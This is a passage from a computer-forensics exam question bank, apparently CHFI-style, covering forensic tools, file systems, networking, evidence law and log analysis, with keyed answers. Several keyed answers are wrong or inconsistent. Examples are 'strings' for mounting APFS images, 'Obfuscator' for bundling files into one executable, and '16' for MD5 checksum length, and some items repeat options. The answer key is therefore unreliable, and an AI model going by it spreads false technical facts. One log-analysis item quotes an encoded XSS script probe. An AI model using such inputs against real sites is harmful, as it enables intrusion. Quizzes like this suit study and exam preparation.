Correct Answer
C.
CRITIFENCE
D.
Postman
Question 174

Which component in the Microsoft Excel file structure holds information about each workbook’s features?

A.
Records
B.
Streams
Correct Answer
C.
Global substream
D.
Worksheet substream
Question 175

Which Apache core element manages routines, interacts with clients, and handles data exchange and socket connections?

A.
http_main
B.
http_protocol
C.
http_request
Correct Answer
D.
http_core
Question 176

Which program allows bundling all files together into a single executable file via compression to bypass security software?

A.
Dropper
B.
Packer
Correct Answer
C.
Obfuscator
D.
Payload
Question 177

Which approach helps investigators identify if a system serves as a relay for a hacker and gather event data?

A.
Event de-duplication
B.
Fingerprint-based approach
C.
Event aggregation
Correct Answer
D.
Vulnerability-based approach
Question 178

Which command allows investigators to mount an image in the APFS format and view its contents on a Linux system?

A.
wevtutil
B.
fsutil
C.
losetup
Correct Answer
D.
strings
Question 179

Which hashing algorithm is commonly used in digital forensics?

A.
MD5
Correct Answer
B.
SHA-1
C.
SHA-256
D.
All of the above
Question 180

Which of the following is a common tool used for network traffic analysis?

A.
Wireshark
Correct Answer
B.
Autopsy
C.
EnCase
D.
FTK Imager
Question 181

What is the purpose of chain of custody documentation?

A.
To analyze the evidence for digital artifacts
B.
To identify potential suspects in a cybercrime
C.
To recover deleted files from a storage device
D.
To track the evidence from collection to court
Correct Answer
Question 182

What is the purpose of the MAC address in a network?

A.
Resolving domain names to IP addresses
B.
Providing a virtual IP address
C.
Identifying devices at the physical layer
Correct Answer
D.
Encrypting network traffic
Question 183

Which layer of the OSI model is responsible for data encryption?

A.
Physical
B.
Presentation
Correct Answer
C.
Transport
D.
Application
Question 184

Which of the following is a legal document that demonstrates the progression of evidence from its original location to the forensic laboratory?

A.
Origin of Custody
B.
Evidence Examine
C.
Chain of Custody
Correct Answer
D.
Evidence Document
Question 185

Which type of digital data stores a document file on a computer when it is deleted and helps in the process of retrieving the file until that file space is reused?

A.
Metadata
B.
Residual Data
Correct Answer
C.
Archival Data
D.
Transient Data
Question 186

What is the purpose of hashing in digital forensics?

A.
To hide data
B.
To verify data integrity
Correct Answer
C.
To compress data
D.
To encrypt data
Question 187

Which role is played by international agencies when cybercrime crosses state or international borders and requires sharing information and resources with other state agencies?

A.
Investigation
B.
Collaboration
Correct Answer
C.
Policy and regulation
D.
Victim assistance
Question 188

Which of the following challenges of cybercrime is demonstrated when the attacker hides their IP address using proxies and uses a fake identity for communication?

A.
Evidence size and complexity
B.
Anonymity
Correct Answer
C.
Limited legal understanding
D.
Speed
Question 189

Which device is responsible for translating internal private IP addresses to a public IP address?

A.
Firewall
B.
Switch
C.
Router
D.
NAT device
Correct Answer
Question 190

Which of the following practices indicates that an organization is not forensically prepared to maintain business continuity?

A.
Legally persecute the perpetrators and claim damages
B.
Quickly determine the incidents
C.
Minimize the required resources
D.
Inability to collect legally sound evidence
Correct Answer
Question 191

Which of the following factors of cloud forensics involves assisting organizations in following appropriate rules and adhering to requirements such as securing critical data, maintaining records for audit, and notifying the parties affected by sensitive data exposure?

A.
Regulatory compliance
Correct Answer
B.
System recovery
C.
Log monitoring
D.
Data recovery
Question 192

Which of the following tools helps Rowen to acquire data remotely?

A.
BitLocker
B.
L0phtCrack
C.
rtgen
D.
netcat
Correct Answer
Question 193

Identify the process that involves discovering, protecting, collecting, reviewing, and presenting electronically stored information (ESI) during an investigation.

A.
Jailbreaking
B.
eDiscovery
Correct Answer
C.
Rooting
D.
Chain of Custody
Question 194

Which stage in the booting process of a Linux system establishes a temporary root file system using the initial RAM disk (initrd) until the real file system is mounted?

A.
BIOS stage
B.
Bootloader stage
C.
Grand unified bootloader (GRUB) stage
D.
Kernel stage
Correct Answer
Question 195

Mike, a forensic investigator, finds a computer at the crime scene that is switched off. What should he do?

A.
He should leave the computer off
Correct Answer
B.
He should turn on the computer
C.
He should turn on the computer and start analyzing it
D.
He should leave the computer off
Question 196

Which forensic artifact would indicate the last time a user logged in to a system?

A.
Browser history
B.
Registry entries
C.
Security event logs
Correct Answer
D.
File timestamps
Question 197

What is the primary role of EnCase in digital forensics?

A.
Disk imaging
Correct Answer
B.
Log analysis
C.
Email investigation
D.
Network scanning
Question 198

What does ARP stand for in networking?

A.
Address Reallocation Process
B.
Application Routing Path
C.
Automated Routing Protocol
D.
Address Resolution Protocol
Correct Answer
Question 199

Thomas, a forensics specialist, was resolving a case related to fake email broadcasting. He retrieved data from the victim system for analysis to find the source of the email server. He extracted only “.ost” files for this purpose. What type of data acquisition did Thomas perform?

A.
Bit-stream disk-to-disk
B.
Bit-stream disk-to-image-file
C.
Sparse acquisition
D.
Logical acquisition
Correct Answer
Question 200

What is the purpose of hash functions in digital forensics?

A.
Compressing forensic images
B.
Ensuring file integrity
Correct Answer
C.
Encrypting data for secure storage
D.
Detecting malware
Question 201

In what scenario would a forensic investigator use the tool Wireshark?

A.
To create disk images
B.
To analyze email headers
C.
To recover deleted files
D.
To analyze network traffic
Correct Answer
Question 202

Which of the following registry datatypes in a Windows system is used for storing encoded information?

A.
REG_NONE
B.
REG_SZ
C.
REG_DWORD
D.
REG_FULL_RESOURCE_DESCRIPTOR
Correct Answer
Question 203

Which of the following techniques refers to the process of discovering the existence of hidden information within a cover medium?

A.
Steganalysis
Correct Answer
B.
Steganography
C.
Encryption
D.
Cryptography
Question 204

Which hashing algorithm is widely used in digital forensics?

A.
SHA-256
B.
MD5
C.
All of the above
Correct Answer
D.
SHA-1
Question 205

Which attack technique is the combination of both a brute-force attack and a dictionary attack to crack a password?

A.
Hybrid Attack
Correct Answer
B.
Rule-based Attack
C.
Fusion Attack
D.
Syllable Attack
Question 206

Which file system is case-sensitive by default?

A.
exFAT
B.
FAT32
C.
NTFS
D.
ext4
Correct Answer
Question 207

Williams, a forensics specialist, analyzed a malware sample in binary format using OllyDbg to identify the language and functions. What malware analysis technique did Williams use?

A.
File fingerprinting
B.
Malware disassembly
Correct Answer
C.
Performing string searches
D.
Identifying packing or obfuscation methods
Question 208

What is the primary function of the tool Autopsy in digital forensics?

A.
Data carving
Correct Answer
B.
Malware detection
C.
Disk imaging
D.
Network scanning
Question 209

A forensic investigator is analyzing a Windows 10 machine that has crashed several times in the past week. What should be the investigator's most immediate action?

A.
Apply Handle.exe to see the object types and names of all the handles of the crashed programs
B.
Use the Process Dumper tool to dump the entire process space and analyze the contents in the RAM dump file
C.
Analyze the crash dump files using DumpChk to examine the system crash's cause and identify any errors in the applications or the operating system
Correct Answer
D.
Utilize Redline to perform Indicators of Compromise (IOC) analysis and construct a timeline of potential cyber incidents
Question 210

Bob, a forensic expert, wants to examine image files in the E01 format on his Linux machine. Which command can he use to convert the E01-format files into the dd format?

A.
xmount
Correct Answer
B.
lsblk
C.
wevtutil
D.
losetup -f
Question 211

What does a "boot sector" virus target?

A.
User data files
B.
Network configurations
C.
Operating system files
D.
MBR (Master Boot Record)
Correct Answer
Question 212

What is the name of the process of making a bit-by-bit copy of a digital device?

A.
Cloning
B.
Formatting
C.
Hashing
D.
Imaging
Correct Answer
Question 213

Bob discovered password-protected files during a forensic investigation and initiated a password-cracking technique that tries every possible combination of characters until the password is cracked. Which technique did Bob use?

A.
Pass-the-ticket attack
B.
Brute-force attack
Correct Answer
C.
Dictionary Attack
D.
Wire sniffing
Question 214

Which of the following is a common type of malware that replicates itself?

A.
Virus
B.
Trojan horse
C.
Worm
Correct Answer
D.
Spyware
Question 215

Which of the following is an 802.11 network discovery tool that gathers information about nearby wireless APs in real-time and displays it in different diagnostic views and charts?

A.
ESEDatabaseView
B.
Free Hex Editor Neo
C.
NetSurveyor
Correct Answer
D.
Hex Workshop
Question 216

Which of the following is an open-source forensic tool that enables the reliable extraction of the entire contents of a computer’s volatile memory, even if protected by an active anti-debugging or anti-dumping system?

A.
Nessus
B.
THC Hydra
C.
Belkasoft RAM Capturer
Correct Answer
D.
Dependency Walker
Question 217

Identify the malware distribution technique using which attackers use tactics such as keyword stuffing, doorway pages, page swapping, and the addition of unrelated keywords to get a higher ranking on the web for their malware pages.

A.
Social engineered clickjacking
B.
Blackhat search engine optimization
Correct Answer
C.
Drive-by downloads
D.
Spear phishing sites
Question 218

Which of the following is a dedicated high-speed network that provides access to consolidated block-level storage, independent of network traffic?

A.
SSD
B.
NAS
C.
SAN
Correct Answer
D.
HDD
Question 219

In the OSI model, at which layer does packet filtering occur?

A.
Physical
B.
Network
Correct Answer
C.
Transport
D.
Data Link
Question 220

Which of the following refers to the process of the witness being questioned by the attorney who called the latter to the stand?

A.
Witness Authentication
B.
Direct Examination
Correct Answer
C.
Expert Witness
D.
Cross Questioning
Question 221

What is the main difference between TCP and UDP?

A.
UDP uses encryption by default
B.
TCP is used for video streaming
C.
TCP is connection-oriented, while UDP is connectionless
Correct Answer
D.
TCP is faster than UDP
Question 222

Which of the following is a common tool for analyzing network traffic?

A.
Wireshark
Correct Answer
B.
FTK Imager
C.
EnCase
D.
Autopsy
Question 223

Which of the following issues in computer forensics might arise because of improper handling of evidence during an investigation, making the evidence inadmissible in a court of law?

A.
Privacy issues
B.
Infrastructure issues
C.
Legal jurisdiction issues
D.
Legal issues
Correct Answer
Question 225

Which of the following files has 25 50 44 46 as the first characters in hexadecimal representation?

A.
PDF
Correct Answer
B.
BMP
C.
GIF
D.
JPEG
Question 226

In which RAID level disk mirroring is done?

A.
RAID Level 1
Correct Answer
B.
RAID Level 5
C.
RAID Level 0
D.
RAID Level 3
Question 228

As a Computer Hacking Forensic Investigator, you are analyzing an intrusion incident involving fileless malware delivered via a malicious Word document. Which step would be most effective to disrupt the infection chain?

A.
Replacing the antivirus solution with a signature-based IDS
B.
Patching Flash and Java vulnerabilities in browsers
C.
Disabling scripting languages like JavaScript
D.
Implementing a strict policy on macros embedded in Office documents
Correct Answer
Question 229

What is the role of a swap file in a computer system?

A.
Stores system logs
B.
Encrypts system files
C.
Stores BIOS settings
D.
Acts as virtual memory
Correct Answer
Question 230

Andrew is performing a UEFI boot process. The current phase consists of initialization code that executes after powering on the system. Which UEFI boot phase is this?

A.
Boot device selection (BDS) phase
B.
Security (SEC) phase
Correct Answer
C.
Pre-EFI initialization (PEI) phase
D.
Driver execution environment (DXE) phase
Question 231

Which process involves the technical methods and organizational measures for discovering, tracing, and inculpating individuals or groups responsible for cyberattacks?

A.
eDiscovery
B.
Data recovery
C.
Cyber Attribution
Correct Answer
D.
Physical acquisition
Question 232

John, a forensic investigator, needs to get the count of all NetBIOS names resolved by broadcast by querying a WINS server. Which command should he use?

A.
nbtstat -n
B.
nbtstat -r
Correct Answer
C.
nbtstat -n
D.
nbtstat -S
Question 233

Which of the following layers in the IoT architecture consists of all the hardware components, including sensors, RFID tags, and readers, and plays an important part in data collection and connecting devices within the network?

A.
Edge technology layer
Correct Answer
B.
Access gateway layer
C.
Internet layer
D.
Middleware layer
Question 234

Which hashing algorithm is considered the most secure among the options below?

A.
SHA-1
B.
RC4
C.
MD5
D.
SHA-256
Correct Answer
Question 235

Since Hillary is a lay witness, what field would she be considered an expert in?

A.
No particular field
Correct Answer
B.
Technical material related to forensics
C.
Legal issues
D.
Judging the character of defendants/victims
Question 236

What is a key advantage of forensic imaging over direct analysis?

A.
Ensures original data integrity
Correct Answer
B.
More detailed reports
C.
Compatibility with all tools
D.
Faster data access
Question 237

Which tool is commonly used for sniffing network packets?

A.
Netcat
B.
Wireshark
Correct Answer
C.
Nessus
D.
EnCase
Question 238

Which of the following sections of the (ACPO) Principles of Digital Evidence states that no action taken by law enforcement agencies should change data that may subsequently be relied upon in court?

A.
Principle 1
Correct Answer
B.
Principle 3
C.
Principle 2
D.
Principle 4
Question 239

Which port is used for HTTPS traffic?

A.
443
Correct Answer
B.
21
C.
80
D.
22
Question 240

Identify the default location in Fedora Linux from which Clark obtained system access logs.

A.
/var/log/httpd/access_log
Correct Answer
B.
/var/log/apache2/access.log
C.
/var/log/httpd-access.log
D.
/etc/httpd/conf/httpd.conf
Question 241

Which of the following U.S. laws requires financial institutions to protect their customers' information against security threats?

A.
GLBA
Correct Answer
B.
HIPAA
C.
SOX
D.
FISMA
Question 242

Kannon, a forensics specialist, secured affected devices for further investigation. Which investigation step did Kannon perform?

A.
Data analysis
B.
Data acquisition
C.
Search and seizure
Correct Answer
D.
Case analysis
Question 243

During an investigation, you locate evidence that may prove the innocence of the suspect. What type of evidence is this?

A.
Terrible evidence
B.
Inculpatory evidence
C.
Exculpatory evidence
Correct Answer
D.
Mandatory evidence
Question 244

Which of the following tools assists investigators in retrieving deleted email messages from Outlook and Thunderbird email clients?

A.
Paraben's E3
Correct Answer
B.
LiME
C.
Encase
D.
THC-Hydra
Question 245

Which port does FTP use for active data transfer?

A.
21
B.
80
C.
20
Correct Answer
D.
22
Question 246

Which of the following is a proprietary information security standard for organizations that handle cardholder information for major debit, credit, prepaid, e-purse, ATM, and POS cards?

A.
GLBA
B.
PCI DSS
Correct Answer
C.
FISMA
D.
SOX
Question 247

Which of the following tools can be used to analyze network traffic?

A.
EnCase
B.
Autopsy
C.
Wireshark
Correct Answer
D.
FTK Imager
Question 248

What countermeasures could George take to prevent DDoS attacks?

A.
Enable direct broadcasts
B.
Enable BGP
C.
Disable direct broadcasts
Correct Answer
D.
Disable BGP
Question 249

Which feature will you disable to eliminate the ability to enumerate model, OS version, and capabilities on Cisco routers?

A.
Simple Network Management Protocol
B.
Broadcast System Protocol
C.
Cisco Discovery Protocol
Correct Answer
D.
Border Gateway Protocol
Question 250

Which of the following is an open-source forensics tool that allows investigators to extract and analyze artifacts from PCAP, PcapNG, and ETL packet captures?

A.
LogonSessions
B.
tasklist
C.
NetworkMiner
Correct Answer
D.
pwdump7
Question 251

What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings?

A.
Robust copy
B.
Bit-stream copy
Correct Answer
C.
Full backup copy
D.
Incremental backup copy
Question 252

In which of the following attacks does an attacker exploit “http” to gain access to unauthorized directories and execute commands outside the web server’s root directory?

A.
Denial of service (DoS)
B.
Buffer overflow
C.
Unvalidated input
D.
Path traversal
Correct Answer
Question 253

Which type of cyberattack exploits a buffer overflow vulnerability?

A.
Ransomware
B.
Code injection
Correct Answer
C.
DoS
D.
SQL Injection
Question 254

Which of the following roles is played by international agencies when cybercrime crosses state or international borders and requires them to share information and resources with other state agencies?

A.
Investigation
B.
Collaboration
Correct Answer
C.
Policy and regulation
D.
Victim assistance
Question 255

What is the primary purpose of digital evidence preservation?

A.
Speed up the analysis process
B.
Ensure data confidentiality
C.
Maintain integrity for legal proceedings
Correct Answer
D.
Encrypt all collected data
Question 256

Which of the following parameters in the Apache common log format represents the client’s IP address?

A.
%I
B.
%u
C.
%h
Correct Answer
D.
%t
Question 257

Which of the following components of EFS is a part of the security subsystem and acts as an interface with the EFS driver by using a local procedure call (LPC) communication port between the local security authority (LSA) and the kernel-mode security reference monitor?

A.
EFS FSRTL
B.
CryptoAPI
C.
EFS service
Correct Answer
D.
EFS driver
Question 258

Which of the following is NOT a characteristic of volatile memory?

A.
Found in RAM
B.
Used for running processes
C.
Data must be collected immediately
D.
Retains data after power loss
Correct Answer
Question 259

In digital forensics, which file format is commonly used for creating forensic images of a drive?

A.
.log
B.
.ios
C.
.dd
Correct Answer
D.
.exe
Question 260

Which of the following files in a Windows system helps forensic investigators analyze and identify the historical data for executables run in the system?

A.
Shimcache
B.
Rp.log File
C.
Change.log.x File
D.
Amcache
Correct Answer
Question 261

Maria has executed a suspicious executable file in a controlled environment and wants to see if the file adds/modifies any registry value after execution via Windows Event Viewer. Which of the following event ID should she look for in this scenario?

A.
Event ID 4624
B.
Event ID 7040
C.
Event ID 4688
Correct Answer
D.
Event ID 4657
Question 262

Which of the following tools helps investigators expand investigations by allowing the capture of an entire social media account or timeline from which they can search the captured OCR PDF or MHTML file for related content?

A.
HttpLogBrowser
B.
ThreatStream
C.
KFSensor
D.
WebPreserver
Correct Answer
Question 263

Carlos, a forensic analyst, was investigating a system that was compromised earlier. He started the investigation process by extracting the Apache access log entries and searching for malicious HTML tags or their hex equivalents in HTTP requests. Carlos identified some encoded values, such as %3Cscript%3Ealert%28XSS%29%3C%2Fscript%3E in the query string. He assumed it was an XSS attack and decoded them. Which of the following characters represents the hex equivalent %29 in the above scenario?

A.
>
B.
)
Correct Answer
C.
(
D.
<
Question 264

Select the tool appropriate for finding the dynamically linked lists of an application or malware.

A.
Dependency Walker
Correct Answer
B.
SysAnalyzer
C.
ResourcesExtract
D.
PEiD
Question 265

When an investigator contacts by telephone the domain administrator or controller listed by a Who is lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?

A.
Title 18, Section 1030
B.
Title 18, Section 2703(d)
C.
Title 18, Section Chapter 90
D.
Title 18, Section 2703(f)
Correct Answer
Question 266

If you come across a sheepdip machine at your client site, what would you infer?

A.
A sheepdip coordinates several honeypots
B.
A sheepdip computer is another name for a honeypot
C.
A sheepdip computer is used only for virus-checking.
Correct Answer
D.
A sheepdip computer defers a denial of service attack
Question 267

In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court?

A.
rules of evidence
B.
law of probability
C.
chain of custody
Correct Answer
D.
policy of separation
Question 268

How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?

A.
128
B.
64
C.
32
D.
16
Correct Answer
Question 269

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate to archive.org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: What have you found?

A.
Web bug
Correct Answer
B.
CGI code
C.
Trojan.downloader
D.
Blind bug
Question 270

You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors?

A.
0:1000, 150
B.
0:1709, 150
Correct Answer
C.
1:1709, 150
D.
0:1709-1858
Question 271

A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker. Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt. (Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.) 03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23678634 2878772 03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111 UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84 Len: 64 - 01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 . ............. 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 . .............. 00 00 00 11 00 00 00 00 ........ 03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773 UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104 Len: 1084 - 47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8

A.
The attacker has conducted a network sweep on port 111
Correct Answer
B.
The attacker has scanned and exploited the system using Buffer Overflow
C.
The attacker has used a Trojan on port 32773
D.
The attacker has installed a backdoor
Question 272

You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly stealing clothing designs from the company and selling them under a different brand name for a different company. What you discover during the course of the investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different. What area of the law is the employee violating?

A.
trademark law
Correct Answer
B.
copyright law
C.
printright law
D.
brandmark law
Question 273

What file structure database would you expect to find on floppy disks?

A.
NTFS
B.
FAT32
C.
FAT16
D.
FAT12
Correct Answer
Question 274

What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled?

A.
digital attack
B.
denial of service
Correct Answer
C.
physical attack
D.
ARP redirect
Question 275

When examining a file with a Hex Editor, what space does the file header occupy?

A.
the last several bytes of the file
B.
the first several bytes of the file
Correct Answer
C.
none, file headers are contained in the FAT
D.
one byte at the beginning of the file
Question 276

In the context of file deletion process, which of the following statement holds true?

A.
When files are deleted, the data is overwritten and the cluster marked as available
B.
The longer a disk is in use, the less likely it is that deleted files will be overwritten
C.
While booting, the machine may create temporary files that can delete evidence
Correct Answer
D.
Secure delete programs work by completely overwriting the file in one go
Question 277

A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloaded. What can the investigator do to prove the violation?

A.
Image the disk and try to recover deleted files
Correct Answer
B.
Seek the help of co-workers who are eye-witnesses
C.
Check the Windows registry for connection data (you may or may not recover)
D.
Approach the websites for evidence
Question 278

A(n) _____________________ is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence.

A.
blackout attack
B.
automated attack
Correct Answer
C.
distributed attack
D.
central processing attack
Question 280

It takes _____________ mismanaged case/s to ruin your professional reputation as a computer forensics examiner?

A.
by law, three
B.
quite a few
C.
only one
Correct Answer
D.
at least two
Question 281

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

A.
0
Correct Answer
B.
10
C.
100
D.
1
Question 282

When examining the log files from a Windows IIS Web Server, how often is a new log file created?

A.
the same log is used at all times
B.
a new log file is created everyday
Correct Answer
C.
a new log file is created each week
D.
a new log is created each time the Web Server is started
Question 283

Which part of the Windows Registry contains the user's password file?

A.
HKEY_LOCAL_MACHINE
Correct Answer
B.
HKEY_CURRENT_CONFIGURATION
C.
HKEY_USER
D.
HKEY_CURRENT_USER
Question 284

An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are ______________ media used to store large amounts of data and are not affected by the magnet.

A.
logical
B.
anti-magnetic
C.
magnetic
D.
optical
Correct Answer
Question 285

Lance wants to place a honeypot on his network. Which of the following would be your recommendations?

A.
Use a system that has a dynamic addressing on the network
B.
Use a system that is not directly interacting with the router
C.
Use it on a system in an external DMZ in front of the firewall
D.
It doesn't matter as all replies are faked
Correct Answer
Question 286

What does the acronym POST mean as it relates to a PC?

A.
Primary Operations Short Test
B.
PowerOn Self Test
Correct Answer
C.
Pre Operational Situation Test
D.
Primary Operating System Test
Question 287

Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?

A.
bench warrant
B.
wire tap
C.
subpoena
D.
search warrant
Correct Answer
Question 288

You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?

A.
All forms should be placed in an approved secure container because they are now primary evidence in the case.
B.
The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container.
Correct Answer
C.
The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file.
D.
All forms should be placed in the report file because they are now primary evidence in the case.
Question 289

The MD5 program is used to:

A.
wipe magnetic media before recycling it
B.
make directories on an evidence disk
C.
view graphics files on an evidence drive
D.
verify that a disk is not altered when you examine it
Correct Answer
Question 300

Which is a standard procedure to perform during all computer forensics investigations?

A.
with the hard drive removed from the suspect PC, check the date and time in the system's CMOS
Correct Answer
B.
with the hard drive in the suspect PC, check the date and time in the File Allocation Table
C.
with the hard drive removed from the suspect PC, check the date and time in the system's RAM
D.
with the hard drive in the suspect PC, check the date and time in the system's CMOS
Question 301

The Recycle Bin exists as a metaphor for throwing files away, but it also allows a user to retrieve and restore files. Once the file is moved to the recycle bin, a record is added to the log file that exists in the Recycle Bin. Which of the following files contains records that correspond to each deleted file in the Recycle Bin?

A.
INFO2
Correct Answer
B.
INFO1
C.
LOGINFO1
D.
LOGINFO2
Question 302

Before accessing digital evidence from victims, witnesses, or suspects, on their electronic devices, what should the investigator do first to respect legal privacy requirements?

A.
Protect the device against external communication
B.
Remove the battery or turn-off the device
C.
Obtain a formal written consent to search
D.
Notify the fact to the local authority or employer
Correct Answer
Question 303

“To ensure that the evidence is collected, preserved, examined, or transferred in a manner safeguarding the accuracy and reliability of the evidence, law enforcement, and forensics organizations must establish and maintain an effective quality system” is a principle established by:

A.
SWGDE
Correct Answer
B.
NCIS
C.
NIST
D.
EC-Council
Question 304

Chloe is a forensic examiner who is currently cracking hashed passwords for a crucial mission and hopefully solve the case. She is using a lookup table used for recovering a plain text password from cipher text; it contains word list and brute-force list along with their computed hash values. Chloe is also using a graphical generator that supports SHA1. (a) What password technique is being used? (b) What tool is Chloe using?

A.
a. Cain & Able b. Rten
B.
a. Rainbow Tables b. Winrtgen
Correct Answer
C.
a. Dictionary attack b. Cisco PIX
D.
a. Brute-force b. MScache
Question 305

To which phase of the Computer Forensics Investigation Process does the Planning and Budgeting of a Forensics Lab belong?

A.
Post-investigation Phase
B.
Reporting Phase
C.
Pre-investigation Phase
Correct Answer
D.
Investigation Phase
Question 306

Gary is checking for the devices connected to USB ports of a suspect system during an investigation. Select the appropriate tool that will help him document all the connected devices.

A.
DevScan
B.
Devcon
Correct Answer
C.
fsutil
D.
Reg.exe
Question 307

Which standard is used during a judicial trial to assess whether an expert witness’s scientific testimony is based on scientifically valid reasoning that can adequately be applied (admissible) to the facts under consideration?

A.
Daubert Standard
Correct Answer
B.
Joiner Standard
C.
Dunn Standard
D.
Carmichael Standard
Question 308

Which of the following attacks allows an attacker to access restricted directories, including application source code, configuration, and critical system files, and then execute commands outside of the web server’s root directory?

A.
Unvalidated input
B.
Parameter/Form tampering
C.
Directory traversal
Correct Answer
D.
Security misconfiguration
Question 309

Which of the following is considered as the starting point of a databases and stores user data and database objects in an MS SQL Server?

A.
Primary data files (MDF)
Correct Answer
B.
ibdata1
C.
Application data files (ADF)
D.
Transaction log data files (LDF)
Question 310

Which of the following methods of mobile device data acquisition captures all the data present on the device, as well as all deleted data and access to unallocated space?

A.
Direct acquisition
B.
Physical acquisition
Correct Answer
C.
Logical acquisition
D.
Manual acquisition
Question 311

During an investigation, Noel found a SIM card from the suspect's mobile. The ICCID on the card is 8944245252001451548. What does the first four digits (89 and 44) in the ICCID represent?

A.
TAC and industry identifier
B.
Industry identifier and country code
C.
Country code and industry identifier
Correct Answer
D.
Issuer identifier number and TAC
Question 312

Which of these Windows utilities helps you to repair logical file system errors?

A.
CHKDSK
Correct Answer
B.
Disk cleanup
C.
Resource Monitor
D.
Disk defragmenter
Question 313

When analyzing logs, it is important that the clocks of all the network devices are synchronized. Which protocol will help in synchronizing these clocks?

A.
UTC
B.
PTP
C.
Time Protocol
D.
NTP
Correct Answer
Question 314

During the course of his investigation, Vincent came across a situation where he needs to run a packet sniffing tool on a Linux-based machine to monitor the network traffic. Which tool should Vincent choose in this case?

A.
Tcpdump
Correct Answer
B.
Balbuzard
C.
CurrPorts
D.
DumpIt
Question 315

Rule 1002 of Federal Rules of Evidence (US) talks about _____

A.
Admissibility of duplicates
B.
Admissibility of original
C.
Requirement of original
Correct Answer
D.
Admissibility of other evidence of contents
Question 316

Which of the following applications will allow a forensic investigator to track the user login sessions and user transactions that have occurred on an MS SQL Server?

A.
netcat
B.
Event Log Explorer
C.
ApexSQL Audit
Correct Answer
D.
Notepad++
Question 317

You are an information security analyst for a national retail chain. The organization has a web server which provides customer reports to internal users for marketing purposes. You are analyzing IIS logs on the web server and find the following log entry: #Software: Microsoft Internet Information Services 7.5 #Version 1.0 #Date 2020-04-28 11:50:54 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken 2020-04-28 11:50:54 192.168.1.39 GET /Data/Files/customer_report.xlsx 80 – 192.168.1.200 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22 200 0 0 54 Based on the contents of this log entry, what occurred?

A.
A User at IP address 192.168.1.39 requested the customer_report.xlsx file and the web server at IP address 192.168.1.200 processed the request
B.
A User at IP address 192.168.1.39 requested the customer_report.xlsx file and the web server at IP address 192.168.1.200 failed to process the request
C.
A User at IP address 192.168.1.200 requested the customer_report.xlsx file and the web server at IP address 192.168.1.39 failed to process the request
D.
A User at IP address 192.168.1.200 requested the customer_report.xlsx file and the web server at IP address 192.168.1.39 processed the request
Correct Answer
Question 318

Donald made an OS disk snapshot of a compromised Azure VM under a resource group being used by the affected company as a part of forensic analysis process. He then created a vhd file out of the snapshot and stored it in a file share and as a page blob as backup in a storage account under different region. What is the next thing he should do as a security measure?

A.
Delete the OS disk of the affected VM altogether
B.
Delete the snapshot from the source resource group
Correct Answer
C.
Recommend changing the access policies followed by the company
D.
Create another VM by using the snapshot
Question 319

You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a 'simple backup copy' of the hard drive in the PC and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a 'simple backup copy' will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?

A.
Robust copy
B.
Incremental backup copy
C.
Bit-stream copy
Correct Answer
D.
Full backup copy
Question 320

